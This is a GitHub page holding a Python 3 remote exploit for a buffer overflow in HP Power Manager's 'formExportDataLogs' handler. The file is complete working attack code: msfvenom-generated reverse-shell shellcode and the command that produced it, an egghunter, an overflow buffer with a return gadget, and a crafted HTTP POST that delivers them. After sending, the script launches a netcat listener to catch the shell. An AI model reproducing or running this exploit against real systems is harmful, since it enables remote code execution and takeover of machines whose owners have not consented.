HP-Power-Manager-Buffer-Overflow-Python3/hp_pm_exploit_p3.py at master · sparkByProxy/HP-Power-Manager-Buffer-Overflow-Python3 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
#!/usr/bin/python3
# This is a python3 port / extension of the HP Power Manager 'formExportDataLogs' Buffer Overflow Script by Muhammad Haidari
# For the original script visit: https://github.com/Muhammd/HP-Power-Manager
#
# Usage: python3 hp_pm_exploit_p3.py <Remote IP Address> <Remote Port> <Local Listener Port>
# <Remote IP Address>: ip address the HP Power Manager is running on
# <Remote Port>: port the application is running on
# <Local Listener Port>: local port your shellcode is connecting back to -> script starts nc listener to catch reverse shell
#
# Swap out the shellcode
# Tested on HP Power Manager 4.2 (Build 7) on Windows 7 Ultimate (6.1.7600 N/A Build 7600)
# Author: CountablyInfinite

from urllib import parse
from sys import argv, exit
from socket import socket, AF_INET, SOCK_STREAM
from os import system

try:
    HOST = argv[1]
    PORT = int(argv[2])  # port the remote application is running on
    LPORT = int(
        argv[3]
    )  # port the shellcode is connecting back to -> listener gets sta
    if len(argv) > 4:
        raise IndexError
except IndexError:
    print(
        "Usage: python3 %s <Remote IP Address> <Remote Port> <Local Listener Port>"
        % argv[0]
    )
    print("Example: python3 %s 10.10.0.1 80 4411" % argv[0])
    exit()

# msfvenom -p windows/shell_reverse_tcp LHOST=<Your IP> LPORT=4411  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24' x86/alpha_mixed --platform windows -f c
# add reverse shell after 'b33fb33f'
buf = (
    "b33fb33f"
    "\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
    "\x0e\x94\xbe\x85\xe6\x83\xee\xfc\xe2\xf4\x68\x56\x07\xe6"
    "\x94\xbe\xe5\x6f\x71\x8f\x45\x82\x1f\xee\xb5\x6d\xc6\xb2"
    "\x0e\xb4\x80\x35\xf7\xce\x9b\x09\xcf\xc0\xa5\x41\x29\xda"
    "\xf5\xc2\x87\xca\xb4\x7f\x4a\xeb\x95\x79\x67\x14\xc6\xe9"
    "\x0e\xb4\x84\x35\xcf\xda\x1f\xf2\x94\x9e\x77\xf6\x84\x37"
    "\xc5\x35\xdc\xc6\x95\x6d\x0e\xaf\x8c\x5d\xbf\xaf\x1f\x8a"
    "\x0e\xe7\x42\x8f\x7a\x4a\x55\x71\x88\xe7\x53\x86\x65\x93"
    "\x62\xbd\xf8\x1e\xaf\xc3\xa1\x93\x70\xe6\x0e\xbe\xb0\xbf"
    "\x56\x80\x1f\xb2\xce\x6d\xcc\xa2\x84\x35\x1f\xba\x0e\xe7"
    "\x44\x37\xc1\xc2\xb0\xe5\xde\x87\xcd\xe4\xd4\x19\x74\xe1"
    "\xda\xbc\x1f\xac\x6e\x6b\xc9\xd6\xb6\xd4\x94\xbe\xed\x91"
    "\xe7\x8c\xda\xb2\xfc\xf2\xf2\xc0\x93\x41\x50\x5e\x04\xbf"
    "\x85\xe6\xbd\x7a\xd1\xb6\xfc\x97\x05\x8d\x94\x41\x50\xb6"
    "\xc4\xee\xd5\xa6\xc4\xfe\xd5\x8e\x7e\xb1\x5a\x06\x6b\x6b"
    "\x12\x8c\x91\xd6\x45\x4e\xb9\x10\xed\xe4\x94\xaf\xbe\x6f"
    "\x72\xd4\x95\xb0\xc3\xd6\x1c\x43\xe0\xdf\x7a\x33\x11\x7e"
    "\xf1\xea\x6b\xf0\x8d\x93\x78\xd6\x75\x53\x36\xe8\x7a\x33"
    "\xfc\xdd\xe8\x82\x94\x37\x66\xb1\xc3\xe9\xb4\x10\xfe\xac"
    "\xdc\xb0\x76\x43\xe3\x21\xd0\x9a\xb9\xe7\x95\x33\xc1\xc2"
    "\x84\x78\x85\xa2\xc0\xee\xd3\xb0\xc2\xf8\xd3\xa8\xc2\xe8"
    "\xd6\xb0\xfc\xc7\x49\xd9\x12\x41\x50\x6f\x74\xf0\xd3\xa0"
    "\x6b\x8e\xed\xee\x13\xa3\xe5\x19\x41\x05\x65\xfb\xbe\xb4"
    "\xed\x40\x01\x03\x18\x19\x41\x82\x83\x9a\x9e\x3e\x7e\x06"
    "\xe1\xbb\x3e\xa1\x87\xcc\xea\x8c\x94\xed\x7a\x33"
)

# egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a' -e b33f -v 'hunter'
hunter = b""
hunter += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += b"\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
hunter += b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

buffer = b"\x41" * (721 - len(hunter))
buffer += b"\x90" * 30 + hunter
buffer += b"\xeb\xc2\x90\x90"  # JMP SHORT 0xC2
buffer += b"\xd5\x74\x41"  # pop esi # pop ebx # ret 10 (DevManBE.exe)

content = "dataFormat=comma&exportto=file&fileName=%s" % parse.quote_plus(buffer)
content += "&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017&LogType=Application&actionType=1%253B"

payload = "POST /goform/formExportDataLogs HTTP/1.1\r\n"
payload += "Host: %s\r\n" % HOST
payload += "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
payload += "Accept: %s\r\n" % buf
payload += "Referer: http://%s/Contents/exportLogs.asp?logType=Application\r\n" % HOST
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: %s\r\n\r\n" % len(content)
payload += content

s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print("[+] HP Power Manager 'formExportDataLogs' Buffer Overflow Exploit")
print(
    "[+] Sending exploit to Ip "
    + str(HOST)
    + " on port "
    + str(PORT)
    + ". Starting local listener on port "
    + str(LPORT)
)
s.send(payload.encode("latin1"))
system("nc -nlvp " + str(LPORT))
s.close()